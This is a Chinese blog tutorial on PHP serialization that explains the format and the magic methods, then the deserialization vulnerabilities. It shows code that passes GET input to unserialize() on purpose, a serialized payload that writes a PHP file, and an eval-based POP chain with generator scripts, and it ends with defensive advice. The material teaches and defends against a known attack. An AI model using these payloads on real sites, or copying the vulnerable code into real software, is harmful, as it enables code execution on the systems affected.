PHP序列化

最新推荐文章于 2024-06-05 22:03:46 发布
最新推荐文章于 2024-06-05 22:03:46 发布
阅读量2.9k 收藏 10
点赞数 3
分类专栏: php Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39293438/article/details/83242499
版权
Web 同时被 2 个专栏收录
30 篇文章 1 订阅
订阅专栏
php
8 篇文章 0 订阅
订阅专栏

基本概念

序列化:

  • serialize() 将对象转变成一个字符串便于之后的传递与使用。
  • 序列化会保存对象所有的变量,但是不会保存对象的方法。

反序列化:

  • unserialize() 将序列化的结果恢复成对象。
  • 反序列化一个对象,这个对象的类必须在反序列化之前定义,或者通过包含该类的定义或者使用 spl_autoload_register() (自动包含类)实现

序列化后格式:

  • 布尔型:
b:value
b:0 //false
b:1 //true
  • 整数型:
i:value
i:1
i:-1
  • 字符型:
s:length:"value";
s:4:"aaaa";
  • NULL型:
N;
  • 数组:
a:<length>:{key; value pairs};
a:1:{i:1;s:1:"a";}
  • 对象:
O:<class_name_length>:"<class_name>":<number_of_properties>:{<properties>};
O:6:"person":3:{s:4:"name";N;s:3:"age";i:19;s:3:"sex";N;}

序列化实列:

<?php

class User
{
	public $name = '';
	public $age = 0;

	public function PrintData()
	{
		echo 'User '.$this->name.'is '.$this->age.' years old';
	}
}

$user = new User();
$user->name = 'John';
$user->age = 20;

$exp = serialize($user);
// O:4:"User":2:{s:4:"name";s:4:"John";s:3:"age";i:20;}
echo $exp.'<br>';

$user1 = unserialize($exp);
// 调用 PrintData() 函数:User Johnis 20 years old
$user1->PrintData();
?>

魔术方法(Magic Methods):

  • php 类中包含的一些以 _ 开头的函数

  • __construct 对象被创建时调用,但 unserialize() 时不会调用

  • __destruct 对象被销毁时调用

  • __toString 对象被当做字符串使用时调用,返回一个字符串(不仅 echo ,比如 file_exists() 也会触发)

  • __sleep 序列化对象之前调用此方法(返回一个包含对象中所有应被序列化的变量名称的数组

  • __wakeup 恢复反序列化对象之前调用

  • __call 调用不存在的方法时

  • 更多魔术方法参照:http://php.net/manual/zh/language.oop5.magic.php#object.tostring

魔术方法实例:

<?php

class Str3am{
	public $var1 = 'abc';
	public $var2 = '123';

	public function echoP(){
		echo $this->var1.'<br>';
	}
	public function __construct(){
		echo "__construct<br>";
	}
	public function __destruct(){
		echo "__destruct<br>";
	}
	public function __toString(){
		return "__toString<br>";
	}
	public function __sleep(){
		echo "__sleep<br>";
		// 注意返回带类中所有变量名称的数组
		return array('var1', 'var2');
	}
	public function __wakeup(){
		echo "__wakeup<br>";
	}
}

// 创建对象,输出__construct
$obj = new Str3am();
// 调用 echoP 方法
$obj->echoP();
// 把类当做字符串输出,输出__toString
echo $obj;
// 序列化对象,输出__sleep
$s = serialize($obj);
// O:6:"Str3am":2:{s:4:"var1";s:3:"abc";s:4:"var2";s:3:"123";}
echo $s.'<br>';
// 反序列对象,输出__wakeup
unserialize($s);
// 脚本结束,对象被销毁,输出两个 __destruct,还有一个是 unserialize 恢复的对象
?>
__destruct实例:脚本结束后删除日志
// logfile.php
<?php 

class LogFile
{
    // log文件名

    public $filename = 'error.log';

    // 某代码,储存日志进文件

    public function LogData($text)
    {
        echo 'Log some data: ' . $text . '<br />';
        file_put_contents($this->filename, $text, FILE_APPEND);
    }

    // Destructor 删除日志文件

    public function __destruct()
    {
        echo '__destruct deletes "' . $this->filename . '" file. <br />';
        unlink(dirname(__FILE__) . '/' . $this->filename);
    }
}

?>

<?php

include 'logfile.php';

// 创建一个对象

$obj = new LogFile();

// 设置文件名和要储存的日志数据

$obj->filename = 'somefile.log';
$obj->LogData('Test');

// php脚本结束啦,__destruct被调用,somefile.log文件被删除。

?>

漏洞利用

反序列化漏洞主要原因在于程序逻辑,魔方函数或者其他函数存在危险功能,通过反序列刚好能利用这个功能,就导致了漏洞产生。

具体可以参见文末 Chybeta 的文章

利用 Magic Function

用了 chybeta 大佬的代码做演示,index.php 源码如下:

<?php
class chybeta{
	var $test = '123';
	function __wakeup(){
		// $fp = fopen('shell.php','w');
		// fwrite($fp, $this->test);
		// fclose($fp);
		file_put_contents('shell.php', $this->test);
	}
}

$class = $_GET['test'];
print_r($class);
echo "<br>";

$class_unser = unserialize($class);

require("./shell.php");

payload O:7:"chybeta":1:{s:4:"test";s:18:"<?php phpinfo();?>";} ,这里比较坑的一点是,访问页面前端显示是不完整的,需要查看源代码。

生成 payload 的代码:

<?php
class chybeta{
	var $test = "123";
	function __wakeup(){
		$fp = fopen("shell.php","w") ;
		fwrite($fp,$this->test);
		fclose($fp);
	}
}
$class4 = new chybeta();
$class4->test = "<?php phpinfo();?>";
$class4_ser = serialize($class4);	
print_r($class4_ser);
?>

反序列化漏洞个人感觉比较依赖程序逻辑,有反序列化且调用危险函数的地方都可以留意下,同时还要注意调用其他对象的情况如下面这个例子:

<?php
class ph0en1x{
	function __construct($test){
		$fp = fopen("shell.php","w") ;
		fwrite($fp,$test);
		fclose($fp);
	}
}
class chybeta{
	var $test = '123';
	function __wakeup(){
		$obj = new ph0en1x($this->test);
	}
}
$class5 = $_GET['test'];
print_r($class5);
echo "</br>";
$class5_unser = unserialize($class5);
require "shell.php";
?>

利用普通成员方法

当危险函数存在于普通成员方法而不是自动调用的 Magic Function 中时,这时候寻找相同的函数名。

ex1:

<?php
class chybeta{
	var $test;
	function __construct(){
		$this->test = new ph0en1x();
	}

	function __destruct(){
		$this->test->action();
	}
}

class ph0en1x{
	function action(){
		echo "ph0en1x";
	}
}

class ph0en2x{
	var $test2;
	function action(){
		eval($this->test2);
	}
}

$class = new chybeta();

unserialize($_GET['test']);
?>

希望执行 __destruct() 函数时调用 ph0en2x 中的 action() 函数,构造 pop 链

<?php
class chybeta{
	var $test;
	function __destruct(){
		$this->test->action();
	}
}

class ph0en2x{
	var $test2 = "phpinfo();";
	function action(){
		eval($this->test2);
	}
}

$class = new chybeta();
$class->test = new ph0en2x();

echo serialize($class);
?>

PHP Session 处理器的安全隐患

脚本处理序列化所用处理器不一致导致漏洞,具体可以参照这篇文章

PHP Session 序列化及反序列化处理器设置使用不当带来的安全隐患

防御

  1. 避免用户可控 unserialize() 参数
  2. 换用 json 传递信息

参考链接

php序列化 - L3m0n
https://www.cnblogs.com/iamstudy/articles/php_serialize_problem.html

浅谈php反序列化漏洞 - Chybeta
https://chybeta.github.io/2017/06/17/浅谈php反序列化漏洞/

理解 php 对象注入
http://wooyun.jozxing.cc/static/drops/papers-4820.html

PHP Session 序列化及反序列化处理器设置使用不当带来的安全隐患
http://wooyun.jozxing.cc/static/drops/tips-3909.html

柠檬木有枝qwq
关注
  • 3
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
ctf之php序列化,CTF——Web——PHP序列化和反序列化
weixin_35126200的博客
04-01 874
PHP 序列化和反序列化:1,序列化(串行化):是将变量转换为可保存或传输的字符串的过程;反序列化(反串行化):就是在适当的时候把这个字符串再转化成原来的变量使用。这两个过程结合起来,可以轻松地存储和传输数据,使程序更具维护性。常见的php系列化和反系列化方式主要有:serialize,unserialize;json_encode,json_decode在进行类的序列化时 私有属性 会加 空白...
在线php序列化解析,PHP序列化serialize
weixin_30583711的博客
03-12 2031
## PHP序列化serialize****序列化对象 - 在会话中存放对象所有php里面的值都可以使用函数serialize()来返回一个包含字节流的字符串来表示。unserialize()函数能够重新把字符串变回php原来的值。 序列化一个对象将会保存对象的所有变量,但是不会保存对象的方法,只会保存类的名字。为了能够unserialize()一个对象,这个对象的类必须已经定义过。如果序列化类A...
PHP序列化的概念
qq_60463414的博客
08-13 1324
PHP序列化漏洞之PHP序列化概念
PHP序列化和反序列化
qq_31088019的博客
08-25 4169
PHP序列化和反序列化及案例
php序列化初步了解
cyy001128的博客
05-29 1260
序列化(串行化):将变量转换为可保存或传输的字符串的过程(通常是字节流、JSON、XML格式)反序列比(反串行化):把这个字符串再转化成原始数据结构或对象(原来的变量)使用。
在线php序列化解析,PHP 序列化/反序列化的方法函数
weixin_39621178的博客
03-12 916
序列化(串行化):将变量转换为可保存或传输的字符串的过程,数组就能够存储到mysql数据库;反序列化(反串行化):把字符串再转化成原来的变量使用。这两个过程结合起来,可以轻松地存储和传输数据,使程序更具维护性。常见的php系列化和反系列化方式主要有:serialize,unserialize;json_encode,json_decode。1. serialize和unserialize函数这两个...
php序列化和反序列化
BoJing6的博客
03-16 1302
我们可以在该函数中添加一些释放资源的操作,比如关闭文件、关闭数据库链接、清空一个结果集等,但__destruct() 在日常的编码中并不常见,因为它是非必须的,是类的可选组成部分。},发现报错就是__wakeup()函数的问题,需要对象属性个数的值大于真实的属性个数,所以修改payload:/?运用脚本生成序列化字符串 O:4:"xctf":1:{s:4:"flag";
php php 序列化方法,PHP序列化的4种方法已公布,这是你PHP进阶之路必会的
weixin_39631350的博客
03-19 3886
【摘要】php作为一种编程软件,也能实现很多功能,不过今天环球网校的小编要为大家讲解PHP序列化的4种方法已公布,这是你PHP进阶之路必会的?看完这个代码你就明白了,因为只要你了解了PHP序列化的4种方法已公布,这是你PHP进阶之路必会的,你对于PHP7的了解就更深入了。在PHP中,序列化用于存储或传递 PHP 的值的过程中,同时不丢失其类型和结构。本文讲述PHP序列化的四种方案,感兴趣的可以了解...
PHP序列化、反序列化
最新发布
2401_82985722的博客
06-05 1072
1.对象被创建时触发__construct()方法,对象使用完被销毁时触发__destruct()方法。2.对象被序列化时触发了__sleep(),字符串被反序列化时触发了__wakeup()//大写字母O表示对象,4是类名长度,test为类名,表示该类有3个成员属性。类型:长度:“值”…admin=admin,passwd=ctf时得到flag,序列化p。admin=admin,passwd=wllm得到flag,序列化p。4.$a->h()调用了不存在的方法触发了__call()方法。
在线php序列化工具,序列化器 | Elasticsearch-PHP | Elastic
weixin_30452659的博客
03-12 6541
实现自定义序列化器edit如果你想使用自定义序列器,你需要实现 SerializerInterface 接口。请记住,对于所有的 endpoint 和连接来说,客户端只使用一个序列器对象。class MyCustomSerializer implements SerializerInterface{/*** Serialize request body** @param string|array ...
PHP序列化与反序列化
dydydt的博客
07-11 920
序列化与反序列化
详解PHP序列化和反序列化原理
10-18
本篇文章给大家分享了下PHP序列化漏洞系列之PHP序列化和反序列化原理的相关知识,有这方面需要的朋友参考学习下吧。
PHP序列化/对象注入漏洞分析
12-18
PHP序列化/对象注入漏洞是一种安全威胁,它发生在应用程序中,当不安全地处理序列化数据时,攻击者可以操纵序列化的对象以执行恶意代码。本文深入探讨了这种漏洞的原理,以及如何利用它来获取远程shell。 首先,...
PHP序列化操作方法分析
10-21
主要介绍了PHP序列化操作方法,结合实例形式分析了php序列化的原理、实现方法、相关函数与操作技巧,需要的朋友可以参考下
详解PHP序列化序列化的方法
12-19
PHP中,序列化和反序列化是两个重要的概念,它们用于在内存和持久存储(如文件、数据库)之间转换复杂的数据结构。序列化是将数据结构(如数组、对象)转换为字符串的过程,以便存储或传输;而反序列化则是将这个...
PHP 序列化和反序列化函数实例详解
12-20
PHP中,序列化和反序列化是两个非常重要的概念,它们主要用于处理复杂的数据结构,如数组、对象等。序列化允许我们将这些数据结构转换为简单的字符串格式,方便存储或传输,而反序列化则能将这些字符串还原为原始...
Linux SUID 提权
柠檬木有枝
01-27 4824
文章目录0x00 前言0x01 关于 SUID1.1 /etc/sudoers 语法1.2 查找具有 SUID 权限位文件0x02 常用提权方式2.1 nmap2.2 find2.3 vi/vim2.4 bash2.5 less2.6 more2.7 cp2.8 mv2.9 nano2.10 awk2.11 man2.12 wget2.13 apache2.14 tcpdump2.15 pytho...
PHP函数漏洞总结
柠檬木有枝
08-26 2655
前言 本文主要针对 PHP 函数相关的漏洞的总结,可能会偏向 CTF 方面,内容肯定不全,有空的话会持续更新,欢迎各位表哥补充以及对文章错误之处进行斧正! 1 弱类型安全问题 1.1 == 弱类型比较缺陷 === 在进行比较的时候,会先判断两种字符串的类型是否相等,再比较 == 在进行比较的时候,会先将字符串类型转化成相同,再比较 (1)字符串的开始部分决定了它的值,如果该字符串以合法的数值开始,则使用该数值,否则其值则为0 var_dump("admin"==0); //true var_dump("1a
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值